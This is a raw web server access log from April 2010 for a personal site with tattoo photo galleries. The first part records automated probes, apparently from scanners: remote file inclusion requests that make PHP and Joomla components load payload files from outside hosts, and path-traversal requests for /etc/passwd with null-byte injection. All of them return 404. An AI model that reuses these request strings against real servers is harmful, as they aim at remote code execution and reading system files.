79.98.23.9 - - [15/Apr/2010:23:54:33 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:23:54:59 -0500] "GET /logs/access_log.1220054400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
79.98.23.9 - - [15/Apr/2010:23:55:05 -0500] "GET /logs/access_log.1219708800%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.46.13.145 - - [15/Apr/2010:23:55:29 -0500] "GET /logs/access_log.1241654400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.98.23.9 - - [15/Apr/2010:23:55:47 -0500] "GET /logs/access_log.1219363200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.46.13.88 - - [15/Apr/2010:23:59:59 -0500] "GET /logs/access_log.1233532800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.98.23.9 - - [16/Apr/2010:00:03:21 -0500] "GET /logs/access_log.1270684800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 379 "-""Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:03:21 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:03:21 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:00:05:02 -0500] "GET /logs/access_log.1220054400%20%20//gore.php?libpath=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:00:05:02 -0500] "GET /logs//gore.php?libpath=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:00:05:02 -0500] "GET //gore.php?libpath=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:00:05:40 -0500] "GET //gore.php?libpath=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:00:05:40 -0500] "GET /logs//gore.php?libpath=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:00:05:40 -0500] "GET /logs/access_log.1220054400%20%20//gore.php?libpath=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.201.180.130 - - [16/Apr/2010:00:15:21 -0500] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
200.201.180.130 - - [16/Apr/2010:00:15:22 -0500] "GET /index.php?openfile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
200.201.180.130 - - [16/Apr/2010:00:15:35 -0500] "GET /logs/index.php?openfile=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
200.201.180.130 - - [16/Apr/2010:00:15:35 -0500] "GET /index.php?openfile=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
84.40.30.37 - - [16/Apr/2010:00:17:12 -0500] "GET /logs/access_log.1265760000/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:17:13 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:17:13 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:17:13 -0500] "GET /logs/access_log.1265760000/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:17:13 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:17:13 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:17:52 -0500] "GET /logs//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:17:53 -0500] "GET //akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:17:52 -0500] "GET /logs/access_log.1220054400//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:18:05 -0500] "GET /logs/access_log.1220054400//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:18:05 -0500] "GET //akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:18:05 -0500] "GET /logs//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:18:15 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:18:15 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:18:16 -0500] "GET /logs/access_log.1265760000/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:18:25 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:18:28 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:18:32 -0500] "GET /logs/access_log.1265760000/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:18:46 -0500] "GET /logs/access_log.1213401600/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:00:19:00 -0500] "GET /logs/access_log.1213401600/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:00:19:05 -0500] "GET /logs/access_log.1220054400//gore.php?libpath=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.195.112.180 - - [16/Apr/2010:00:21:00 -0500] "GET /logs/access_log.1209168000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.22.207.181 - - [16/Apr/2010:00:25:02 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:00:25:02 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:00:25:03 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
96.230.240.226 - - [16/Apr/2010:00:31:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:31:34 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/search?q=bert+grimm%27s+tattoos&form=QBRE&qs=n&sk=""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:31:34 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:31:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:12 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:13 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:14 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:14 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:14 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:14 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:14 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:50 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:51 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:32:51 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
96.230.240.226 - - [16/Apr/2010:00:33:05 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
